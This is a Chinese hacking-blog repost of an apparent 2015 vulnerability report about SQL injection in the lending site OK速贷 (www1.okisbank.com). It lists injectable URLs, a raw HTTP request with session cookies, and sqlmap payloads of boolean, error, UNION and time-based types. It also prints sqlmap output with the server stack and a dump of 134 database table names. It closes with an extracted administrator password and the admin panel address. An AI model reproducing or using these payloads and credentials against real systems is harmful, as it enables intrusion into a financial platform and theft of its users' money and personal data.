记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

OK速贷多处高危漏洞可进后台资金数千万

2015-05-18 20:40

注入一:


GET /?plugins&q=areas&area_id=174 HTTP/1.1
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip,deflate
Cache-Control: max-age=0
Host: www1.okisbank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
DNT: 1
Connection: close
Cookie: PHPSESSID=ja1oli3mo1pdjfmpfi8qitrfv3; _jzqx=1.1426652708.1426652708.1.jzqsr=okisbank%2Ecom|jzqct=/user/login%2Ehtml.-; _jzqckmp=1; _ga=GA1.2.264870878.1426652708; _jzqa=1.1246666155320797000.1426652708.1426652708.1426735724.2; _jzqc=1; LXB_REFER=74.125.227.77; _jzqb=1.4.10.1426735724.1; Hm_lvt_0fed600eaace02a001f9ebf0a244f274=1426651774,1426654101,1426654412,1426736984; Hm_lpvt_0fed600eaace02a001f9ebf0a244f274=1426737794; dy_cookie_time=604800; 6ec6cef6a06f93620f0bd7d4d7d741d6=bab4m9R8As45YzkwT%2FjAdIivXGmOFOW8KgPRwOwCjy3WF373l%2BD1rX%2BO0gw
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3


注入二:http://www1.okisbank.com/u/215'注入三:http://www1.okisbank.com/?


user&q=code/borrow/loan&p=repay&type=tender&username=189 用户界面带搜索的地方几乎全有注射例如:http://www1.okisbank.com/?user&q=code/borrow/tender&p=now&keywords=111%27&dotime1=2015-03-19&dotime2=2015-03-19
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND 1731=1731
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND (SELECT 5321 FROM(SELECT COUNT(*),CONCAT(0x7163706271,(SELECT (CASE WHEN (5321=5321) THEN 1 ELSE 0 END)),0x7166796971,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 UNION ALL SELECT NULL,CONCAT(0x7163706271,0x4f694676505649465261,0x7166796971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www1.okisbank.com:80/?plugins&q=areas&area_id=174 AND SLEEP(5)
---
[12:18:42] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.0
[12:18:42] [INFO] fetching tables for database: 'okisbank'
Database: okisbank
[134 tables]
+------------------------------------+
| deayou_account |
| deayou_account_balance |
| deayou_account_bank |
| deayou_account_cash |
| deayou_account_fee |
| deayou_account_fee_type |
| deayou_account_log |
| deayou_account_payment |
| deayou_account_recharge |
| deayou_account_users |
| deayou_account_users_bank |
| deayou_account_web |
| deayou_approve |
| deayou_approve_edu |
| deayou_approve_edu_id5 |
| deayou_approve_id5 |
| deayou_approve_realname |
| deayou_approve_sms |
| deayou_approve_smslog |

| deayou_approve_video |
| deayou_areas |
| deayou_articles |
| deayou_articles_pages |
| deayou_articles_type |
| deayou_attestations |
| deayou_attestations_type |
| deayou_attestations_user |
| deayou_borrow |
| deayou_borrow_activity |
| deayou_borrow_amount |
| deayou_borrow_amount_apply |
| deayou_borrow_amount_log |
| deayou_borrow_amount_type |
| deayou_borrow_auto |
| deayou_borrow_autolog |
| deayou_borrow_care |
| deayou_borrow_change |
| deayou_borrow_count |
| deayou_borrow_count_log |
| deayou_borrow_credit |
| deayou_borrow_fee |
| deayou_borrow_fee_log |
| deayou_borrow_fee_type |
| deayou_borrow_flag |
| deayou_borrow_recover |
| deayou_borrow_repay |
| deayou_borrow_roam |
| deayou_borrow_style |
| deayou_borrow_tender |
| deayou_borrow_tender_auto |
| deayou_borrow_tender_autolog |
| deayou_borrow_tender_web |
| deayou_borrow_type |
| deayou_borrow_verify |
| deayou_borrow_vouch |
| deayou_borrow_vouch_recover |
| deayou_borrow_vouch_repay |
| deayou_comment |
| deayou_comments |
| deayou_credit |
| deayou_credit_class |
| deayou_credit_log |
| deayou_credit_rank |
| deayou_credit_type |


| deayou_dw_activity_review |
| deayou_group |
| deayou_group_articles |
| deayou_group_comments |
| deayou_group_log |
| deayou_group_member |
| deayou_group_type |
| deayou_linkages |
| deayou_linkages_class |
| deayou_linkages_type |
| deayou_links |
| deayou_links_type |
| deayou_luckmember_addcount_history |
| deayou_luckmember_award_address |
| deayou_luckmember_award_history |
| deayou_luckmember_count |
| deayou_message |
| deayou_message_receive |
| deayou_modules |
| deayou_rating_assets |
| deayou_rating_company |
| deayou_rating_contact |
| deayou_rating_educations |
| deayou_rating_finance |
| deayou_rating_houses |
| deayou_rating_info |
| deayou_rating_job |
| deayou_remind |
| deayou_remind_log |
| deayou_remind_type |
| deayou_remind_user |
| deayou_scrollpic |
| deayou_scrollpic_type |
| deayou_site |
| deayou_site_menu |
| deayou_sms_type |
| deayou_spread_add |
| deayou_spread_log |
| deayou_spreads_log |
| deayou_spreads_set |
| deayou_spreads_users |
| deayou_system |
| deayou_system_auto |


| deayou_system_type |
| deayou_ucenter |
| deayou_ucenter_set |
| deayou_users |
| deayou_users_admin |
| deayou_users_admin_type |
| deayou_users_adminlog |
| deayou_users_care |
| deayou_users_care_user |
| deayou_users_email |
| deayou_users_email_log |
| deayou_users_examines |
| deayou_users_friends |
| deayou_users_friends_invite |
| deayou_users_friends_type |
| deayou_users_info |
| deayou_users_log |
| deayou_users_qq |
| deayou_users_rebut |
| deayou_users_reglog |
| deayou_users_sina |
| deayou_users_type |
| deayou_users_upfiles |
| deayou_users_vip |
| deayou_users_viplog |
| deayou_users_visit |
| deayou_weixin |
+------------------------------------+
注入出管理员账号:ok速贷ok123http://www1.okisbank.com/?admin



mask 区域

*****58f7a9.jpg" alt="1672_ap*****

 

知识来源: www.2cto.com/Article/201505/399617.html

阅读:186160 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“OK速贷多处高危漏洞可进后台资金数千万”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云